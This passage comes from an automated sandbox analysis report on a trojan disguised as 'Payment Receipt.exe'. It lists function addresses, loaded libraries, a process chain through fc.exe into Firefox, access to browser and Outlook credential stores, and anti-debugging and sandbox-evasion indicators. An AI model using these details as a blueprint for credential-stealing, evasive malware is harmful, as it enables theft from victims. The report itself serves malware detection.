              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02FFA8405_2_02FFA840
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02FF29A05_2_02FF29A0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_0301E8F05_2_0301E8F0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03032F285_2_03032F28
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03010F305_2_03010F30
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03092F305_2_03092F30
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03064F405_2_03064F40
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02FF0E595_2_02FF0E59
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_0306EFA05_2_0306EFA0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_030AEE265_2_030AEE26
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02FE2FC85_2_02FE2FC8
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03002E905_2_03002E90
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_030ACE935_2_030ACE93
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_030AEEDB5_2_030AEEDB
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02FE0CF25_2_02FE0CF2
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_0308CD1F5_2_0308CD1F
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03008DBF5_2_03008DBF
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02FF0C005_2_02FF0C00
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02FEADE05_2_02FEADE0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03090CB55_2_03090CB5
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02FFAD005_2_02FFAD00
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_030A132D5_2_030A132D
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02FF52A05_2_02FF52A0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_0303739A5_2_0303739A
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02FDD34C5_2_02FDD34C
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_0300B2C05_2_0300B2C0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_030912ED5_2_030912ED
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_0300D2F05_2_0300D2F0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02FF70C05_2_02FF70C0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_030BB16B5_2_030BB16B
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_0302516C5_2_0302516C
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02FFB1B05_2_02FFB1B0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02FDF1725_2_02FDF172
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_0309F0CC5_2_0309F0CC
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_030A70E95_2_030A70E9
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_030AF0E05_2_030AF0E0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_030AF7B05_2_030AF7B0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_030356305_2_03035630
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_030A16CC5_2_030A16CC
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_030A75715_2_030A7571
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02FE14605_2_02FE1460
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_0308D5B05_2_0308D5B0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_030B95C35_2_030B95C3
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_030AF43F5_2_030AF43F
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_030AFB765_2_030AFB76
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_0300FB805_2_0300FB80
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03065BF05_2_03065BF0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_0302DBF95_2_0302DBF9
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_030AFA495_2_030AFA49
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_030A7A465_2_030A7A46
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03063A6C5_2_03063A6C
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03035AA05_2_03035AA0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_0308DAAC5_2_0308DAAC
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03091AA35_2_03091AA3
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_0309DAC65_2_0309DAC6
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_030859105_2_03085910
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02FF38E05_2_02FF38E0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_0300B9505_2_0300B950
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_0305D8005_2_0305D800
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02FF99505_2_02FF9950
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_030AFF095_2_030AFF09
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02FF9EB05_2_02FF9EB0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_030AFFB15_2_030AFFB1
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02FB3FD25_2_02FB3FD2
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02FB3FD55_2_02FB3FD5
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02FF1F925_2_02FF1F92
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_030A1D5A5_2_030A1D5A
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_030A7D735_2_030A7D73
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_0300FDC05_2_0300FDC0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_03069C325_2_03069C32
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02FF3D405_2_02FF3D40
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_030AFCF25_2_030AFCF2
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_00811FD05_2_00811FD0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_0080CE805_2_0080CE80
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_0080B0805_2_0080B080
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_0080D0A05_2_0080D0A0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_0080B07F5_2_0080B07F
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_0080B1C45_2_0080B1C4
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_0080B1D05_2_0080B1D0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_008011E75_2_008011E7
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_008156805_2_00815680
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_008138805_2_00813880
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_0081387B5_2_0081387B
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_0082BCD05_2_0082BCD0
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02E5E2F55_2_02E5E2F5
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02E5E7B35_2_02E5E7B3
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02E5E4135_2_02E5E413
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02E5E57B5_2_02E5E57B
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02E5CB135_2_02E5CB13
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02E5D8785_2_02E5D878
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exeCode function: 6_2_050D42236_2_050D4223
              Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 7_2_0000022E9D10357B7_2_0000022E9D10357B
              Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 7_2_0000022E9D1028787_2_0000022E9D102878
              Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 7_2_0000022E9D1037B37_2_0000022E9D1037B3
              Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 7_2_0000022E9D1034137_2_0000022E9D103413
              Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 7_2_0000022E9D1032F57_2_0000022E9D1032F5
              Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 7_2_0000022E9D101B137_2_0000022E9D101B13
              Source: C:\Windows\SysWOW64\fc.exeCode function: String function: 0305EA12 appears 86 times
              Source: C:\Windows\SysWOW64\fc.exeCode function: String function: 02FDB970 appears 265 times
              Source: C:\Windows\SysWOW64\fc.exeCode function: String function: 03025130 appears 58 times
              Source: C:\Windows\SysWOW64\fc.exeCode function: String function: 0306F290 appears 103 times
              Source: C:\Windows\SysWOW64\fc.exeCode function: String function: 03037E54 appears 107 times
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: String function: 0162F290 appears 103 times
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: String function: 0159B970 appears 262 times
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: String function: 015F7E54 appears 107 times
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: String function: 015E5130 appears 58 times
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: String function: 0161EA12 appears 86 times
              Source: Payment Receipt.exeStatic PE information: No import functions for PE file found
              Source: Payment Receipt.exe, 00000000.00000003.2016351170.000000000111D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFC.EXEj% vs Payment Receipt.exe
              Source: Payment Receipt.exe, 00000000.00000002.2016615336.0000000001841000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Payment Receipt.exe
              Source: Payment Receipt.exe, 00000000.00000003.1926428067.0000000001326000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Payment Receipt.exe
              Source: Payment Receipt.exe, 00000000.00000003.1928236553.00000000014EC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Payment Receipt.exe
              Source: Payment Receipt.exe, 00000000.00000003.2016351170.0000000001128000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameFC.EXEj% vs Payment Receipt.exe
              Source: Payment Receipt.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: Payment Receipt.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: Payment Receipt.exeStatic PE information: Section .text
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/1@14/10
              Source: C:\Windows\SysWOW64\fc.exeFile created: C:\Users\user\AppData\Local\Temp\17O3k-2IJump to behavior
              Source: Payment Receipt.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
              Source: C:\Users\user\Desktop\Payment Receipt.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: fc.exe, 00000005.00000002.4097379677.0000000002C1D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: Payment Receipt.exeVirustotal: Detection: 62%
              Source: Payment Receipt.exeReversingLabs: Detection: 71%
              Source: unknownProcess created: C:\Users\user\Desktop\Payment Receipt.exe "C:\Users\user\Desktop\Payment Receipt.exe"
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exeProcess created: C:\Windows\SysWOW64\fc.exe "C:\Windows\SysWOW64\fc.exe"
              Source: C:\Windows\SysWOW64\fc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exeProcess created: C:\Windows\SysWOW64\fc.exe "C:\Windows\SysWOW64\fc.exe"Jump to behavior
              Source: C:\Windows\SysWOW64\fc.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
              Source: C:\Users\user\Desktop\Payment Receipt.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: ulib.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: ieframe.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: mlang.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: winsqlite3.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: vaultcli.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
              Source: C:\Windows\SysWOW64\fc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
              Source: Payment Receipt.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: fc.pdb source: Payment Receipt.exe, 00000000.00000003.2016351170.000000000111D000.00000004.00000020.00020000.00000000.sdmp, MEREhDqMRRNSzT.exe, 00000004.00000002.4097527146.0000000000AD8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: fc.pdbGCTL source: Payment Receipt.exe, 00000000.00000003.2016351170.000000000111D000.00000004.00000020.00020000.00000000.sdmp, MEREhDqMRRNSzT.exe, 00000004.00000002.4097527146.0000000000AD8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: MEREhDqMRRNSzT.exe, 00000004.00000000.1941108983.00000000003CE000.00000002.00000001.01000000.00000005.sdmp, MEREhDqMRRNSzT.exe, 00000006.00000002.4097025395.00000000003CE000.00000002.00000001.01000000.00000005.sdmp
              Source: Binary string: wntdll.pdbUGP source: Payment Receipt.exe, 00000000.00000002.2016615336.000000000170E000.00000040.00001000.00020000.00000000.sdmp, Payment Receipt.exe, 00000000.00000003.1926428067.0000000001203000.00000004.00000020.00020000.00000000.sdmp, Payment Receipt.exe, 00000000.00000003.1928236553.00000000013BF000.00000004.00000020.00020000.00000000.sdmp, Payment Receipt.exe, 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000005.00000002.4098206639.000000000314E000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000005.00000003.2018181889.0000000002E04000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000005.00000003.2016579747.0000000002C51000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000005.00000002.4098206639.0000000002FB0000.00000040.00001000.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: Payment Receipt.exe, Payment Receipt.exe, 00000000.00000002.2016615336.000000000170E000.00000040.00001000.00020000.00000000.sdmp, Payment Receipt.exe, 00000000.00000003.1926428067.0000000001203000.00000004.00000020.00020000.00000000.sdmp, Payment Receipt.exe, 00000000.00000003.1928236553.00000000013BF000.00000004.00000020.00020000.00000000.sdmp, Payment Receipt.exe, 00000000.00000002.2016615336.0000000001570000.00000040.00001000.00020000.00000000.sdmp, fc.exe, fc.exe, 00000005.00000002.4098206639.000000000314E000.00000040.00001000.00020000.00000000.sdmp, fc.exe, 00000005.00000003.2018181889.0000000002E04000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000005.00000003.2016579747.0000000002C51000.00000004.00000020.00020000.00000000.sdmp, fc.exe, 00000005.00000002.4098206639.0000000002FB0000.00000040.00001000.00020000.00000000.sdmp
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_00743863 push ss; iretd 0_2_00743880
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_007490BB pushad ; iretd 0_2_007490E4
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_00733490 push eax; ret 0_2_00733492
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_00744DC4 pushfd ; retf 0_2_00744DCE
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0157225F pushad ; ret 0_2_015727F9
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015727FA pushad ; ret 0_2_015727F9
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015A09AD push ecx; mov dword ptr [esp], ecx0_2_015A09B6
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0157283D push eax; iretd 0_2_01572858
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_0157135E push eax; iretd 0_2_01571369
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exeCode function: 4_2_03238024 pushad ; iretd 4_2_0323804D
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exeCode function: 4_2_0323DF65 push ecx; ret 4_2_0323DF66
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exeCode function: 4_2_03233D2D pushfd ; retf 4_2_03233D37
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exeCode function: 4_2_0323DD8A push FFFFFFADh; ret 4_2_0323DD8C
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exeCode function: 4_2_0323D40D push cs; retf 4_2_0323D416
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02FB225F pushad ; ret 5_2_02FB27F9
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02FB27FA pushad ; ret 5_2_02FB27F9
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02FB283D push eax; iretd 5_2_02FB2858
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02FE09AD push ecx; mov dword ptr [esp], ecx5_2_02FE09B6
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02FB1366 push eax; iretd 5_2_02FB1369
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_00800000 push ebx; ret 5_2_0080000E
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_0081B011 push cs; retf 5_2_0081B01A
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_0081B98E push FFFFFFADh; ret 5_2_0081B990
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_00811931 pushfd ; retf 5_2_0081193B
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_0081BB69 push ecx; ret 5_2_0081BB6A
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_00815C28 pushad ; iretd 5_2_00815C51
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_0081DD8B push eax; iretd 5_2_0081DDEC
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02E65202 push eax; ret 5_2_02E65204
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02E5B3C4 push edi; ret 5_2_02E5B445
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02E5B3C8 push edi; ret 5_2_02E5B445
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02E5C033 push ss; iretd 5_2_02E5C036
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_02E571EA push es; ret 5_2_02E571EB
              Source: Payment Receipt.exeStatic PE information: section name: .text entropy: 7.995279909719649
              Source: C:\Windows\SysWOW64\fc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Switches to a custom stack to bypass stack traces
              Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
              Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
              Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
              Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
              Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
              Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
              Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFE22210154
              Source: C:\Windows\SysWOW64\fc.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015E096E rdtsc 0_2_015E096E
              Source: C:\Windows\SysWOW64\fc.exeWindow / User API: threadDelayed 4491Jump to behavior
              Source: C:\Windows\SysWOW64\fc.exeWindow / User API: threadDelayed 5482Jump to behavior
              Source: C:\Users\user\Desktop\Payment Receipt.exeAPI coverage: 0.7 %
              Source: C:\Windows\SysWOW64\fc.exeAPI coverage: 2.6 %
              Source: C:\Windows\SysWOW64\fc.exe TID: 5676Thread sleep count: 4491 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\fc.exe TID: 5676Thread sleep time: -8982000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\fc.exe TID: 5676Thread sleep count: 5482 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\fc.exe TID: 5676Thread sleep time: -10964000s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe TID: 5924Thread sleep time: -75000s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe TID: 5924Thread sleep count: 34 > 30Jump to behavior
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe TID: 5924Thread sleep time: -51000s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe TID: 5924Thread sleep count: 39 > 30Jump to behavior
              Source: C:\Program Files (x86)\HqJQjxiXbgzXzJQPrkFpjRQRsAUVFykHmpBqLkhzjxrjNQXbYnYJ\MEREhDqMRRNSzT.exe TID: 5924Thread sleep time: -39000s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\fc.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\fc.exeCode function: 5_2_0081C870 FindFirstFileW,FindNextFileW,FindClose,5_2_0081C870
              Source: MEREhDqMRRNSzT.exe, 00000006.00000002.4097526393.0000000000BCF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllb
              Source: fc.exe, 00000005.00000002.4097379677.0000000002B60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: firefox.exe, 00000007.00000002.2304400822.0000022E9D28C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllBB
              Source: C:\Users\user\Desktop\Payment Receipt.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\Payment Receipt.exeProcess queried: DebugPortJump to behavior
              Source: C:\Windows\SysWOW64\fc.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015E096E rdtsc 0_2_015E096E
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_00747CA3 LdrLoadDll,0_2_00747CA3
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01674164 mov eax, dword ptr fs:[00000030h]0_2_01674164
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_01674164 mov eax, dword ptr fs:[00000030h]0_2_01674164
              Source: C:\Users\user\Desktop\Payment Receipt.exeCode function: 0_2_015A6154 mov eax, dword ptr fs:[00000030h]0_2_015A6154
